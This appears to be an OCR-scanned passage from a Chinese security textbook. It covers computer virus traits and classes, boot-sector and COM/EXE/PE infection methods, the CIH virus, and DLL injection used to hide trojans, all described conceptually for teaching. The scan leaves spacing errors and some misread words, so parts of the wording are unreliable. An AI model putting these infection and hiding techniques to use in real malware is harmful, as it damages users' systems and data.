宿主 对 象 ,具有 传染 .隐藏 和 破坏 等 能 力 的 程序 代码 。 

计算 机 病毒 产生 的 原因 包括 恶作剧 、 报 复 心理 ,版 权 保护 和 特殊 目的 等 。 计 算 机 病毒 命 
名 的 一 般 格 式 为 [前 级 ]. [病毒 名 j]. [后 缀 ]。 


2.2.1 计算 机 病毒 概述 


1. 计算 机 病毒 特征 

根据 计算 机 病毒 的 产生 传播 和 破坏 行为 概括 为 以 下 6 个 主要 特点 : 

(1) 传染 性 。 指 病毒 具有 把 自身 复制 到 其 他 程序 中 的 特性 ,被 感染 或 寄生 的 程序 称 为 
宿主 程序 。 

(2) 驻 留 性 。 一 般 随 操作 系统 驻 留 在 内 存 ,取得 系统 控制 权 。 

(3) 隐蔽 性 。 通 过 隐蔽 技术 使 宿主 程序 的 大 小 没有 改变 ,以 至 于 很 难 被 发 现 。 

(4) 破坏 性 。 计 算 机 的 所 有 资源 包括 硬件 资源 和 软件 资源 ,软件 所 能 接触 的 地 方 均 可 
能 受到 计算 机 病毒 的 破坏 。 

(5) 潜伏 性 。 长 期 隐藏 在 系统 中 ,只 有 在 满足 特定 条 件 时 才 触 发 启动 其 破坏 模块 。 

(6) 寄生 性 。 一 般 寄生 在 系统 盘 的 主 引 导 扇 区 .逻辑 扇 区 或 可 执行 程序 中 。 寄 生 方式 
采用 替代 法 或 链接 法 。 替 代 法 是 指 病毒 程序 用 自己 的 部 分 或 全 部 指令 代码 替代 磁盘 扇 区 或 
文件 中 的 全 部 或 部 分 内 容 。 链 接 法 是 指 病毒 程序 将 自身 代码 作为 正常 程序 的 一 部 分 与 原 有 
正常 程序 链接 在 一 起 ,链接 位 置 可 能 在 正常 程序 的 首部 .尾部 或 中 间 。 

另外 ,计算 机 病毒 还 包括 程序 性 (可 执行 性 ) ,不 可 预见 性 、 衍 生性 、 可 触发 性 和 伪装 欺骗 
性 等 。 此 外 ,网 络 病毒 又 增加 了 很 多 新 的 特点 ,如 主动 通过 网 络 和 邮件 系统 传播 ;病毒 种 类 
旦 爆炸 式 增长 ;变种 多 ,容易 编写 ,并 且 很 容易 被 修改 ,生成 很 多 病毒 变种 ;融合 多 种 网 络 技 
术 , 并 被 黑客 所 使 用 。 

2. 计算 机 病毒 的 分 类 

按照 病毒 攻击 的 操作 系统 分 为 DOS 系统 病毒 、Windows 系统 病毒 (用 户 使 用 多 ,主要 
的 攻击 对 象 ).UNIX 系统 病毒 .OS/2 系统 病毒 、NetWare 系统 病毒 。 

按照 病毒 攻击 计算 机 的 机 型 ,分 为 微型 机 病毒 、 小 型 机 病毒 和 服务 器 病毒 。 

按照 病毒 的 链接 方式 分 为 : 源码 型 病毒 ,病毒 以 源 代 码 形式 存在 于 主体 程序 中 ; 庶 入 型 
病毒 ,将 计算 机 病毒 的 主体 程序 与 其 攻击 对 象 以 插入 方式 进行 链接 ,一 旦 进入 程序 中 就 难以 
清除 ;外 壳 型 病毒 ,将 自身 包围 在 合法 的 主 程序 的 周围 ,对 原来 的 程序 并 不 作 任 何 修改 ,特点 
是 常见 ,易于 编写 容易 发 现 ;操作 系统 型 病毒 ,主要 感染 或 破坏 操作 系统 。 
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按照 病毒 的 破坏 能 力 可 划分 为 无 害 型 .无 危险 型 .危险 型 和 非常 危险 型 4 种 。 

按照 传播 媒介 可 分 为 单机 病毒 和 网 络 病毒 。 

按照 传播 方式 可 分 为 引导 型 病毒 ,文件 型 病毒 (. com、. exe) 和 混合 型 病毒 。 

根据 病毒 特有 算法 和 表现 可 分 为 伴随 型 病毒 “蠕虫 "型 病毒 .寄生 型 病毒 .练习 型 病毒 、 
话 秘 型 病毒 和 变型 病毒 (又 称 为 幽灵 病毒 ) 。 

按照 病毒 的 寄生 部 位 或 传染 对 象 可 分 为 磁盘 引导 区 传染 的 病毒 .操作 系统 传染 的 病毒 
和 可 执行 程序 传染 的 病毒 三 种 。 实 际 上 可 以 归纳 为 引导 区 型 病毒 和 可 执行 文件 型 病毒 两 
大 类 。 

3. 计算 机 病毒 的 组 成 

计算 机 病毒 一 般 由 引导 模块 ,感染 模块 和 表现 模块 三 个 部 分 组 成 。 

引导 模块 实现 将 计算 机 病毒 程序 引入 计算 机 内 存 ,并 使 得 传染 和 表现 模块 处 于 活动 状 
态 。 因 此 ,引导 模块 具有 驻 留 内 存 、 获 取 系 统 控制 权 、 恢 复 系统 功能 的 能 力 ; 需 要 提供 自我 保 
护 功能 ,避免 在 内 存 中 的 自身 代码 不 被 覆盖 或 清除 ;病毒 程序 引入 内 存 后 为 传染 模块 和 表现 
模块 设置 相应 的 启动 条 件 ,以 便 在 适当 的 时 候 或 者 合适 的 条 件 下 激活 传染 模块 或 者 触发 表 
现 模块 。 

感染 模块 判断 感染 条 件 ,依据 引导 模块 设置 的 传染 条 件 判断 当前 系统 环境 是 否 满足 传 
染 条 件 。 如 果 传 染 条 件 满足 , 则 启动 传染 功能 ,将 计算 机 病毒 程序 附加 在 其 他 宿主 程序 上 。 
感染 途径 有 调用 文件 进入 内 存 、 列 目录 、 创 建文 件 等 。 

表现 模块 判断 表现 条 件 ,依据 引导 模块 设置 的 触发 条 件 ,判断 当前 系统 环境 是 否 满足 触 
发 条 件 。 如 果 触 发 条 件 满足 , 则 启动 计算 机 病毒 程序 ,按照 预定 的 计划 执行 。 常 见 的 病毒 激 
活 触发 条 件 有 上 日期. 时间、 键盘、 感染 .启动 .访问 磁盘 或 文件 次 数 . 调 用 中 断 或 特定 功能 、 
CPU 型 号 /主板 型 号 等 种 类 。 

4. 病毒 的 工作 机 制 

从 病毒 的 生命 周期 来 看 ,病毒 一 般 经 历 4 个 阶段 : 

(1) 潜伏 阶段 。 病 毒 程序 处 于 休 眼 状态 ,用 户 根 本 感觉 不 到 病毒 的 存在 。 

(2) 传染 阶段 。 感 染 其 他 程序 ,将 自身 程序 复制 到 其 他 程序 或 者 磁盘 的 某 个 区 域 。 

(3) 触发 阶段 。 计 算 机 运行 到 达 某 种 目标 或 状态 触发 病毒 执行 某 种 特定 功能 。 

(4) 发 作 阶 段 。 病 毒 为 了 既定 目标 而 运行 (如 破坏 文件 ,感染 其 他 程序 等 ) 。 

为 了 实现 病毒 生命 周期 的 转换 ,病毒 程序 必须 具有 如 下 相应 的 工作 机 制 : 

(1) 传播 机 制 。 指 计算 机 病毒 由 一 个 宿主 传播 到 另 一 个 宿主 程序 ,由 一 个 系统 进入 另 
一 个 系统 的 过 程 ,如 本 地 感染 、 网 络 传播 .其 他 磁 介 质 传播 等 。 

病毒 的 传播 方式 可 分 为 被 动 传播 和 主动 传播 两 种 。 被 动 传播 是 复制 磁盘 或 文件 时 从 一 
个 载体 到 另 一 个 载体 ,网 络 通信 时 从 一 方 传 到 另 一 方 。 主 动 传播 是 病毒 在 激活 状态 下 满足 
传播 条 件 ,主动 把 病毒 自身 传播 给 另 一 个 载体 或 另 一 个 系统 。 

病毒 的 传播 途径 有 不 可 移动 的 硬件 设备 (专用 ASIC 芯片 和 硬盘 ) ,移动 存储 设备 (U 
盘 、 移 动 硬盘 ) .计算 机 网 络 、 系 统 软件 漏洞 .点 对 点 通信 系统 和 无 线 通 道 传 播 等 。 病 毒 的 网 
络 传播 载体 有 文件 .E-mail 邮件 、 网 络 共享 软件 (如 KaZza) 和 即时 通信 软件 等 。 

(2) 触发 机 制 。 计 算 机 病毒 在 传染 和 发 作 之 前 要 判断 某 些 特定 的 触发 条 件 是 否 满足 ， 
如 日 期 .时间 . 击 键 .启动 和 特定 事件 等 。 
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(3) 破坏 机 制 。 良 性 病毒 表现 为 占用 内 存 或 硬盘 资源 ,而 恶性 病毒 则 会 对 目标 系统 运 
行 或 数据 信息 产生 严重 破坏 。 破 坏 机 制 表现 为 格式 化 系统 、 删 除 文件 .消耗 内 存 、. 干 扰 输出 、 
扰乱 输入 、 破 坏 硬件 .泄露 隐私 、 安 装 后 门 .DDoS 网 络 服务 器 等 。 

5. 计算 机 中 毒 的 异常 表现 

计算 机 系统 的 异常 表现 经 常 是 计算 机 是 否 中 病毒 的 判断 依据 。 

(1) 计算 机 病毒 发 作 前 的 表现 。 计 算 机 突然 经 常 性 无 缘 无 故地 死机 ,操作 系统 无 法 正 
常 启动 ,运行 速度 明显 变 慢 ,正常 软件 的 运行 经 常 发 生 内 存 不 足 问题 ,打印 和 通信 出 现 异常 ， 
无 意 中 要 求 对 U 盘 进 行 写 操作 ,应 用 程序 的 运行 经 常 发 生死 机 或 者 非法 错误 ,系统 文件 的 
时 间 .日 期 ,大 小 发 生变 化 ,无 法 另存 为 一 个 Word 文档 ,磁盘 空间 迅速 减少 ,网 络 驱动 器 卷 
或 共享 目录 无 法 调用 ,基本 内 存 发 生变 化 ,陌生 人 发 来 的 电子 邮件 ,自动 链接 到 一 些 陌生 的 
网 站 等 都 是 可 能 中 毒 的 前 兆 。 

(2) 计算 机 病毒 发 作 时 的 表现 。 计 算 机 提示 不 相关 对 话 , 莫 名 发 出 音乐 ,产生 特定 的 图 
像 , 硬 盘 灯 不 断 闪烁 ,进行 游戏 算法 ,Windows 桌面 图 标 发 生变 化 ,突然 死机 或 重启 ,自动 发 
送 电子 邮件 或 QQ 通信 消息 ,鼠标 自己 移动 等 都 可 能 是 病毒 正在 运行 的 征兆 。 

(3) 计算 机 病毒 发 作 后 的 表现 。 计 算 机 硬盘 无 法 启动 ,数据 丢失 、 系 统 文件 丢失 或 被 破 
坏 ,文件 目录 发 生 混乱 ,部 分 文档 丢失 或 被 破坏 ,部 分 文档 自动 加 密码 ,系统 配置 文件 如 
Autoexec. bat、win. ini 等 被 莫名 修改 ,注册 表 被 莫名 修改 ,BIOS 程序 被 破坏 ,无 法 提供 正常 
的 网 络 服务 等 都 是 病毒 发 作 后 的 后 遗 症 。 

6. 计算 机 病毒 的 发 展 历史 

(1) 第 一 阶段 :原始 病毒 阶段 。 在 此 阶段 攻击 目标 和 破坏 性 比较 单一 ,病毒 程序 不 具有 
自我 保护 功能 , 较 容易 被 人 们 分 析 , 识 别 和 清除 。 

(2) 第 二 阶段 :混合 型 病毒 阶段 。1989 一 1991 年 , 随 着 计算 机 局 域 网 的 应 用 与 普及 ,给 
计算 机 病毒 带 来 了 第 一 次 流行 高 峰 。 主 要 特点 是 攻击 目标 趋 于 综合 ,以 更 隐蔽 的 方法 驻 留 
在 内 在 和 传染 目标 中 ,系统 感染 病毒 后 没有 明显 的 特征 ,病毒 程序 具有 自我 保护 功能 ,出 现 
众多 病毒 的 变种 。 

(3) 第 三 阶段 :多 态 性 病毒 阶段 。 在 此 阶段 每 次 传染 目标 时 , 放 入 宿主 程序 中 的 病毒 程 
序 大 部 分 是 可 变 的 , 防 病毒 软件 难以 查 杀 , 如 1994 年 “幽灵 ”病毒 等 。1990 年 出 现 了 第 一 个 
多 态 病 毒 ;1991 年 病毒 生产 机 现 身 ;1996 年 国内 发 现 了 G2、IVP、VCL 这 3 种 “病毒 生产 机 
软件 ”;1995 年 发 现 宏 病 毒 ,代表 有 美丽 莎 、 台 湾 一 号 等 。 

(4) 第 四 阶段 :网 络 病毒 阶段 。 随 着 互联 网 的 发 展 ,依赖 互联 网 传播 的 邮件 病毒 和 宏 病 
毒 等 泛滥 ,呈现 出 病毒 传播 快 .隐蔽 性 强 、 破 坏 性 大 等 特点 ,著名 的 病毒 如 CIH 病毒 等 。 
Office 软件 宏 病毒 .基于 Windows 运行 环境 的 各 种 脚本 病毒 也 日 益 增多 。 

(5) 第 五 阶段 :主动 攻击 型 病毒 阶段 。 主 要 是 21 世纪 以 后 的 病毒 ,典型 代表 有 冲击 波 、 
震荡 波 病 毒 和 木马 等 。2003 年 以 来 产生 重大 影响 的 计算 机 病毒 有 LoveGate( 又 称 为 “ 恶 邮 
差 ”“ 爱 情 后 门 ” 等 )、Sobig、Fizzer、BugBear、MiMail、.Mydoom 和 NetSky 等 。2009 年 出 现 
多 种 病毒 及 其 变种 ,如 U 盘 寄 生 虫 .网 游 窃贼 .代理 木马 、 刻 毒 虫 .无 极 杀手 、 灰 铝 子 二 代 和 
文件 夹 寄 生 虫 等 , 安 天 实验 室 对 2005 一 2009 年 病毒 数量 统计 如 图 2. 1 所 示 。 

这 些 病毒 具有 如 下 几 个 特征 : 大 量 使 用 邮件 进行 传播 (造成 垃圾 邮件 泛滥 ); 大 量 利用 
即时 通信 软件 进行 传播 ; 重 自我 复制 而 轻 感 染 ; 泄漏 用 户 隐私 数据 ;释放 后 门 程序 等 ,功利 
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2005 一 2009 年 病毒 数量 统计 


16 000 000 区 
14 000 000 
12 000 000 
10 000 000 
8659887 
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2 000 000 E299704 
2005 2006 2007 2008 2009 
图 2.1 2005 一 2009 年 安 天 实验 室 病毒 数量 统计 
性 ,目的 性 越 来 越 强 。 


2012 年 金山 网 络 报告 指出 , 鬼 影 病毒 .AV 终结 者 末日 版 ,网购 木 马 、456 游戏 木马 . 连 
环 木 马 ( 后 门 )、.QQ 粘 虫 木马 .新 淘宝 客 病毒 .浏览 器 劫持 病毒 .传奇 私服 劫持 者 .QQ 和 群 里 
虫 等 病毒 类 型 对 用 户 和 危害 最 大 。2013 年 年 初 又 出 现 了 火焰 病毒 。 


2.2.2 传统 的 计算 机 病毒 一 一 DOS 病毒 


20 世纪 以 前 , 绝 大 多 数 病 毒 是 基于 DOS 系统 的 ,传统 计算 机 病毒 是 DOS 系统 病毒 ,能 
感染 DOS 和 Win9X 以 下 的 16 位 系统 。 

DOS 病毒 包括 引导 区 病毒 文件 型 病毒 和 混合 型 病毒 。DOS 病毒 命名 可 以 按 病毒 发 作 
的 时 间 命 名 ,如 黑色 星期 五 ; 按 病毒 发 作 症 状 命 名 ,如 “小 球 ”"“ 火 炬 ”等 ; 按 病毒 自身 包含 的 
标志 命名 ,如 Stoned; 按 病毒 发 现 地 命名 ,如 Jurusalem( 耶 路 撒 冷 ) 病 毒 、Vienna( 维 也 纳 ) 病 
毒 等 ; 按 病 毒 自身 代码 的 字 节 长 度 命名 ,如 1575、2153、1701、1704、1514、4096 等 。 

1. DOS 引导 区 病毒 

引导 区 病毒 实际 上 就 是 先 保存 软盘 的 引导 记录 或 者 硬盘 的 主 引 导 记 录 , 然 后 用 病毒 程 
序 替 换 原 来 的 引导 记录 。 当 系统 引导 时 , 便 先 执行 病毒 程序 ,然后 将 控制 权 转 交 给 正常 的 引 
导 程序 。 

(1) DOS 引导 区 。 所 谓 引导 区 病毒 是 指 一 类 专门 感染 软盘 引导 扇 区 和 硬盘 主 引导 记 
区 的 计算 机 病毒 程序 。 主 引导 记录 (MBR) 如 图 2. 2 所 示 。 

(2) DOS 系统 正常 引导 过 程 。 计 算 机 加 电 后 首先 由 ROM BIOS 程序 自 检 ,对 系统 中 的 
硬件 进行 正确 性 检查 ( 热 启动 不 检查 ) ,设置 Rom Bios 中 断 和 参数 ; 自 检 通 过 后 ,执行 Rom 
Bios 中 的 ROM 引导 程序 INT19H ,利用 BIOS 中 断 调用 INT13 将 引导 盘 中 的 DOS 引导 扇 
区 装 到 主 存 的 0:7C00H 开始 区 域 。 执 行 引 导 盘 的 主 引导 程序 时 ,检查 IO. sys、Msdos. sys 
是 否 存 在 ,如 果 存 在 ,BIOS 中 断 调 用 INT13H 将 IO. sys 读 和 人 人 内存, 控制 权 转 交 SYS_INT; 
执行 SYS_INT, 定 位 IO. sys 并 初始 化 ; 读 和 人 Msdos. sys 文件 并 定位 ,调用 DOS_INIT 对 内 
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引导 代码 及 | 二 引导 程序 (446 字 节 ) 
出 错 信息 
主 分 区 表 分 区 1(16 字 节 ) 
(CPF) 分 区 2(16 字 光 ) 

分 区 3(16 字 节 ) 

分 区 4(16 字 节 ) 
结束 标记 5 
(2 字 节 ) 

图 2.2 主 引 导 记 录 


核 进 行 初 始 化 ;处 理 config. sys 文件 ,并 读 和 人 command. com 文件 ,控制 权 转 交 CMD_INIT; 
执行 CM_INIT 对 command 常 驻 、 暂 驻 模块 进行 定位 并 初始 化 ;执行 Autoexec. bat( 如 果 存 
在 ) ,控制 权 转移 给 Command. com 的 暂 驻 模块 ,出 现 系统 提示 符 , 启 动 过 程 结束 。 

(3) 引导 型 病毒 驻 留 内 存 。 启 动 时 ,将 Boot 区 中 病毒 代码 首先 读 入 内 存 的 0000:7C00 
处 ;病毒 将 自身 全 部 代码 读 入 内 存 的 某 一 安全 地 区 (如 0000:0413)、 常 驻 内 存 ( 如 修改 INT 
8H) ,监视 系统 的 运行 ;修改 INT 13H 中 断 服务 处 理 程序 的 入 口 地 址 ,使 之 指向 病毒 控制 模 
块 并 执行 ;病毒 程序 全 部 被 读 入 内 存 后 才 读 入 正常 的 Boot 内 容 到 内 存 的 0000:7C00 处 , 进 
行 正常 的 启动 过 程 ;病毒 程序 伺机 等 待 随 时 准备 感染 新 的 系统 盘 或 非 系 统 盘 。 

(4) 引导 型 病毒 感染 与 执行 过 程 。 如 图 2. 3 所 示 ,感染 过 程 如 下 : 


系统 引导 区 上 


图 2.3 感染 与 执行 过 程 


@ 系统 调用 INT 13H 时 ,判断 是 否 在 读 写 磁盘 ? 

@ 是 , 则 将 目标 盘 的 引导 扇 区 读 和 内存, 判别 该 盘 是 否 传染 了 病毒 。 

@ 当 满 足 传染 条 件 时 , 则 将 病毒 的 全 部 或 者 一 部 分 写 人 Boot 区 ,把 正常 磁盘 的 引导 区 
程序 写 人 磁盘 特定 位 置 (一 般 在 系统 盘 的 尾部 扇 区 ) 。 

@ 返回 正常 的 INT 13H 中 断 服务 处 理 程序 ,完成 对 目标 盘 的 传染 。 

(5) 病毒 的 激活 过 程 。 感 染 了 引导 区 病毒 的 DOS 系统 修改 了 INT 13 中 断 ,如 图 2.4 
所 示 。 当 满足 发 作 条 件 时 ,修改 INT 8H 中 断 入 口 指向 病毒 代码 的 内 存 地 址 ,真正 的 INT 
8H 地 址 附加 在 病毒 代码 后 面 。 当 正常 程序 执行 过 程 中 调用 INT 8H 处 理 时 钟 中 断 时 , 实 
际 先 执行 了 病毒 发 作 代 码 , 之 后 再 处 理 真 正 的 INT 8H 时 钟 中 断 。 激 活 过 程 如 图 2. 5 所 示 。 


44 


进入 INT 13 中 断 


执行 正常 的 
INT 13 程 序 


执行 正常 的 
INT 13 程 序 


不 发 作 执行 正常 
的 INT 13 程 序 


修改 INT 8 开始 发 作 执行 正常 的 INT 13 程 序 
图 2.4 修改 后 的 INT 13 


int8 


int21 


int2F 


int4A | 
| 时 钟 中 断 处 理 。 | 
一 DOS 中 断 处 理 | 


外 设 处 理 中 断 
病毒 进入 | “| 实时 时 钟 警报 中 断 


| 正常 程序 \ 
空间 区 


int8 | 病毒 上 
内 存 空间 
图 2.5 病毒 的 激活 过 程 


马 柄 玉昌 


(6) 引导 型 病毒 的 特点 。 引 导 型 病毒 的 寄 身 对 象 是 引导 区 ;依托 的 环境 是 BIOS 中 断 服 
务 程序 ;在 ROM BIOS 之 后 先 于 操作 系统 加 载 ; 驻 留 在 高 端 内 存 物 理 位 置 即 可 获得 控制 权 
(DOS 控制 权 的 转交 方式 是 以 物理 位 置 为 依据 ); 采 用 减少 操作 系统 所 掌管 的 内 存 容量 
(640KB) 的 方法 来 驻 留 内 存 高 端 ;一 般 都 是 在 启动 过 程 中 把 病毒 传染 给 系统 引导 盘 的 ;通过 
修改 INT 13H 的 中 断 向 量 指向 内 存 高 端的 病毒 程序 ,将 真正 的 引导 区 内 容 搬家 转移 或 替 
换 , 待 病毒 程序 执行 后 ,将 控制 权 交 给 真正 的 引导 区 内 容 ,系统 看 似 正常 运转 ,而 病毒 已 隐藏 
在 系统 中 并 伺机 传染 ,发 作 。 

例如 ,小 球 病毒 (Bouncing Ball) 在 磁盘 上 的 0 扇 区 存放 病毒 体 的 第 一 部 分 ,在 1 扇 区 文 
件 分 配 表 改 连接 指向 FF7,FF7 处 存放 病毒 体 的 第 二 部 分 。 鬼 影 病 毒 也 感染 Windows XP 
系统 的 引导 区 。 
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引导 记录 被 破坏 后 ,手工 恢复 引导 记录 的 措施 是 Windows XP 下 用 干净 的 系统 盘 启 动 ， 
运行 命令 FDISK /MBR,Windows 7 下 运行 bootsect /nt60 C: /force, 一 般 可 以 恢复 正常 
启动 。 

2. 文件 型 病毒 

所 有 通过 操作 系统 的 文件 系统 进行 感染 的 病毒 都 称 作文 件 病毒 。 主 要 感染 计算 机 中 的 
可 执行 文件 (. exe) 和 命令 文件 (. com) ,也 可 能 是 后 级 名 为 DLL,、bat 或 者 VXD、SYS 的 
文件 。 

(1) COM 文件 型 病毒 。 病 毒 感 染 COM 型 文件 一 般 采 用 两 种 方法 ,如 图 2. 6 所 示 ， 
图 2.6(a) 通过 JMP 指令 加 在 文件 尾部 ,图 2. 6(b) 和 图 2. 6(c) 加 在 文件 头 部 。 


JMP 病 毒 代码 地 址 病毒 代码 病毒 代码 
原始 COM 程 序 代码 原 程序 代码 头 原 程序 代码 
病毒 代码 原 程序 代码 原 程序 代码 头 


(a) 病毒 代码 处 于 文件 尾部 (b) 病毒 代码 处 于 文件 头 部 1 。”(¢) 病毒 代码 处 于 文件 头 部 2 
图 2.6 COM 文件 型 病毒 寄生 方式 


(2) EXE 文件 型 病毒 。 病 毒 感染 EXE 类 型 文件 一 般 采 用 4 种 方法 : 头 寄生 、 尾 寄生 、 
插入 寄生 (如 图 2.7 所 示 ) 和 伴随 寄生 。 


感染 后 的 PE 头 感染 后 的 PE 头 感染 后 的 PE 头 
病毒 代码 病毒 代码 
原 EXE 可 执行 内 容 原 EXE 内 容 (压缩 ) 
原 EXE 可 执行 内 容 病毒 代码 
病毒 代码 原 EXE 可 执行 内 容 
(a) 头 寄 生 (b) 尾 寄生 (0) 插入 寄生 


图 2.7 EXE 文件 型 病毒 的 三 种 感染 寄生 


伴随 寄生 有 三 种 方式 。 第 一 种 是 将 病毒 命名 为 X. COM ,与 原来 某 X. EXE 文件 名 相 
同 ,存放 在 一 块 ,DOS 执行 时 会 优先 执行 X. COM。 第 二 种 是 将 正常 的 X. EXE 改名 为 X. 
OLD, 而 病毒 程序 命名 为 X. EXE。 第 三 种 是 将 病毒 命名 与 某 正 常 程序 X. EXE 相同 ,并 复 
制 到 系统 目录 、path 搜索 到 的 目录 和 当前 目录 。 这 样 , 当 执 行 X. EXE 命令 时 就 优先 执行 病 
毒 程序 。 

3. 混合 型 病毒 

混合 型 病毒 是 指 既 可 以 感染 引导 区 又 可 以 感染 文件 的 病毒 。 但 是 这 种 病毒 绝对 不 是 引 
导 型 病毒 和 文件 型 病毒 的 简单 相 加 。 文 件 型 病毒 大 多 采用 INT 21H ,引导 型 病毒 采用 INT 
13H。 但 是 引导 型 病毒 是 在 引导 阶段 进行 感染 驻 留 ,这 时 DOS 系统 还 没有 启动 ,因此 混合 
型 病毒 此 时 无 法 采用 21 号 中 断 。 

4. DOS 病毒 举例 一 一 CIH 病毒 

CIH 病毒 由 中 国 台 湾 的 大 学 生 陈 盈 豪 制作 ,1998 年 2 月 出 现 CIH1.2 版 ,1999 年 4 月 
26 日 全 球 发 作 ,使 得 全 球 有 超过 6000 万 台 的 机 器 被 感染 ,直接 经 济 损失 超过 亿美 元 。 


46 


CIH 病毒 很 短 ,1. 2 版 只 有 1003 个 字 节 ;通过 网 络 (软件 下 载 ) 传 播 , 是 第 一 个 能 够 破坏 
计算 机 硬件 BIOS 的 病毒 ;可 以 绕 过 Windows 的 应 用 程序 界面 , 绕 过 ActiveX ,使 用 汇编 , 利 
用 虚拟 设备 驱动 程序 VxD 直接 进入 Windows 内 核 ;采用 碎 洞 攻击 技术 ,将 病毒 化 整 为 零 ， 
插入 到 宿主 文件 中 而 不 改变 宿主 文件 大 小 ;利用 多 数 BIOS 芯片 开放 可 重用 性 的 特点 ,可 以 
向 计算 机 主板 的 BIOS 端口 写 人 乱码 (工具 AwdFlash. exe) 。 

CIH 病毒 的 传染 是 通过 病毒 驻 留 内 存 过 程 中 ,调用 Windows 内 核 底 层 的 IFSMgr_ 
InstallFileSystemApiHook 函数 挂 接 钧 子 时 ,指针 指示 的 程序 段 实现 。 这 段 程序 长 586 字 
节 。 大 致 过 程 如 下 : 

(1) 文件 截获 。 调 用 INT 20 的 VxDcallUniToBCSPath 系统 功能 调用 , 取 回 系统 要 开 
启 的 文件 的 文件 名 和 路 径 。 

(2) EXE 文件 判断 。 非 EXE 文件 不 感染 ,离开 病毒 程序 , 跳 回 Windows 内 核 的 正常 文 
件 处 理 程序 。 

(3) PE 格式 判断 。 取 出 文件 标识 符 进行 分 析 , 若 Signature 王 "00455000 (OOPE00)" 
且 未 感染 ,就 对 其 感染 ;否则 只 发 作 。 

(4) 寄生 计算 。CIH 病毒 利用 PE 格式 文件 的 文件 头 和 各 个 区 都 可 能 存在 自由 空间 碎 
片 , 将 病毒 程序 拆 分 成 若干 大 小 不 等 的 块 , 见 颖 插 针 地 插 到 宿主 文件 的 不 同 区 内 。 

(5) 写 人 病毒。 按照 计算 结果 ,将 各 块 压 栈 ,以 逆序 将 各 块 写 人 到 相应 的 自由 空间 。 


2.2.3 Windows 病毒 


20 世纪 以 前 , 绝 大 多 数 病毒 是 基于 DOS 系统 的 ,有 80% 的 病毒 能 在 Windows 中 传染 。 
现代 的 Windows 病毒 带 有 网 络 功 能 ,具有 多 态 性 ,结合 了 其 他 恶意 代码 技术 。 病 毒 生产 机 
是 可 以 按照 用 户 的 意愿 ,自动 化 生产 多 态 病毒 的 机 器 化 程序 软件 ,大 多 数 都 为 脚本 病毒 生 
产 机 。 

Windows 病毒 包括 VBS 脚本 病毒 、 宏 病毒 .网 页 病毒 和 Win32 PE 病毒 。 

1，Win32 PE 病毒 

Win32 环境 下 的 病毒 主要 为 . EXE 文件 (PE 格式 文件 ) ,也 称 PE 文件 型 病毒 。PE 病 
毒 是 指 所 有 感染 Windows 下 PE 文件 格式 文件 的 病毒 ,PE 病毒 大 多 数 采 用 Win32 汇编 
编写 。 

PE 文件 结构 由 DOS MZ 头 部 .DOS STUB、PE 头 部 、 节 区 表 和 多 个 节 区 组 成 。 当 PE 
文件 被 执行 时 ,PE 装载 器 检查 DOS MZ header 里 的 PE header 偏 移 量 ,如 果 找 到 , 则 跳 转 
到 PE header;PE 装载 器 检查 PE header 的 有 效 性 ,如 果 有 效 , 就 跳 转 到 PE header 的 尾部 ; 
紧 跟 PE header 的 是 节 表 ,PE 装载 器 读 取 其 中 的 节 信 息 , 并 采用 文件 映射 方法 将 这 些 节 映 
射 到 内 存 ,同时 附 上 节 表 里 指定 的 节 属性 ;PE 文件 映射 人 内 存 后 ,PE 装载 器 将 处 理 PE 文 
件 中 类 似 import table( 引 入 表 ) 逻 辑 部 分 。 

1) PE 文件 感染 过 程 

感染 PE 文件 必须 满足 两 个 基本 条 件 : 一 是 能 够 在 宿主 程序 中 被 调用 ,获得 运行 权限 。 
主要 采用 重 定位 的 方法 , 改 PE 文件 内 存 地 址 为 病毒 代码 地 址 。 二 是 在 系统 运行 PE 文件 
时 ,病毒 代码 可 以 获取 控制 权 ,在 执行 完 感染 或 破坏 代码 后 ,再 将 控制 权 转移 给 正常 的 程序 
代码 。 
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病毒 感染 时 ,首先 在 PE 文件 中 添加 一 个 新 节 ,该 新 节 中 添加 病毒 代码 和 病毒 执行 后 的 
返回 宿主 程序 的 代码 。 其 次 是 修改 文件 头 中 代码 开始 执行 位 置 (Address Of Entry Point) 
指向 新 添加 的 节 , 以 便 程 序 运 行 时 先 执行 病毒 代码 。 

病毒 进行 各 种 操作 时 需 调 用 API 函数 ,需要 在 感染 PE 文件 的 时 候 搜 索 宿 主 程序 引入 
函数 节 的 相关 地 址 ;或 者 解析 导出 函数 节 , 尤 其 是 Kernel32. DLL。 

PE 病毒 感染 时 还 可 以 将 自己 的 代码 分 散 搬入 到 每 个 节 的 空隙 中 等 (如 CIH) 。 

2) 进程 隐藏 技术 一 一 DLL 注入 

动态 链接 程序 库 (DLL) 的 作用 是 为 应 用 程序 提供 扩展 功能 。 当 病毒 ,木马 代码 写成 一 
个 DLL 文件 时 , 它 可 以 插入 到 一 个 EXE 文件 当中 ,使 其 执行 ,不 需要 占用 进程 ,也 没有 相对 
应 的 PID 号 ,可 以 在 任务 管理 器 中 隐藏 。 

DLL 文件 的 执行 需要 EXE 宿主 文件 加 载 , 并 提供 一 个 DLL 文件 的 入 口 函 数 , 即 DLL 
文件 的 导出 函数 ,EXE 必须 执行 DLL 文件 中 的 DLLMain() 作 为 加 载 的 条 件 ( 如 同 EXE 的 
main())。DLL 注入 进程 技术 有 三 种 方法 : 

(1) 单一 DLL。 把 病毒 或 木马 编译 成 一 个 DLL 文件 ,在 注册 表 Run 键 值 或 其 他 可 以 
被 系统 自动 加 载 的 地 方 ,利用 Rundll32. exe 命令 ,使 用 “Rundll32. exe DLL 文件 名 ,引出 函 
数 名 [引出 函数 参数 ]” 来 自动 启动 。 这 类 病毒 或 木马 很 容易 查 出 。 

(2) 替换 系统 中 的 DLL 文件。 把 实现 了 病毒 木马 功能 的 代码 做 成 一 个 和 系统 匹配 的 
DLL 文件 ,并 把 原来 的 DLL 文件 改名 。 当 遇 到 应 用 程序 请 求 原来 的 DLL 文件 时 ,该 DLL 
后 门 仅 起 转发 的 作用 ,把 “参数 ”传递 给 原来 的 DLL 文件 ;如 果 遇 到 特殊 的 请 求 时 (比如 木马 
客户 端 ) ,该 DLL 就 开始 启动 并 运行 ,可 以 进行 控制 或 恶意 操作 了 。 木 马 一 般 都 是 把 DLL 
文件 做 成 一 个 “启动 "文件 ,在 特殊 请 求 的 情况 下 启动 后 门 ,连接 结束 后 停止 后 门 进 入 “休息 ” 
状态 。 随 着 微软 的 “数字 签名 "和 “文件 恢复 ”功能 出 台 (dllcache) ,这 种 技术 已 经 逐步 衰落 。 

